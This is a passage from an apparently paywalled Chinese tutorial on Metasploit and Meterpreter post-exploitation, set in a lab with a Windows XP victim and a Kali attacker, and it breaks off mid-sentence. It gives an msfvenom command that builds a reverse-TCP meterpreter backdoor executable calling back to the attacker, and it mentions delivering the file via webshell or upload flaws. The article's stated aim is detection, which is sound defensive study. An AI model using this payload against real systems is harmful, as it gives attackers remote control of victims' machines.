零、简介
Metasploit是一款开源的安全漏洞检测利用工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,同时它也是黑客手中的利器,恶意攻击者可以利用它来生成恶意的二进制文件和恶意文档进行一系列的攻击行为。之前爆出的“永恒之蓝”漏洞更是有很多的恶意攻击者将msf与这一高危漏洞结合入侵了大量的机器。Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给攻击者一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时,攻击者必须使用Meterpreter传递攻击载荷。MSFCONSOLE用于管理攻击者的会话,而Meterpreter则是攻击载荷和渗透攻击交互。本文主要通过对Meterpreter的Post-Exploitation进行分析,帮助我们怎样在计算中发现是否被植入恶意的meterpreter代码。
一、环境准备
被攻击主机:Windows xp sp3 (192.168.239.129)
攻击者主机:kali Linux (192.168.17.26)
二、前置知识
Post-Exploitation:攻陷目标中的某一台或者多台主机之后做的一些事情,包括但不限于:识别已经拿下主机的价值以及维持访问。主机对于攻击者来说是否具有一定的价值、具有多大的价值主要从以下两个个方面考虑:是否有敏感信息、数据,是否能够在后期的渗透中发挥价值。比如被攻陷的主机是否是组织中的关键人物、高层领导、系统管理员,被攻陷的主机是够能够尽可能的有内网不同网段的访问权限等等。
三、生成后门
(一)reverse_tcp
新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。
msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe
生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个

最低0.47元/天 解锁文章
1621

被折叠的 条评论
为什么被折叠?



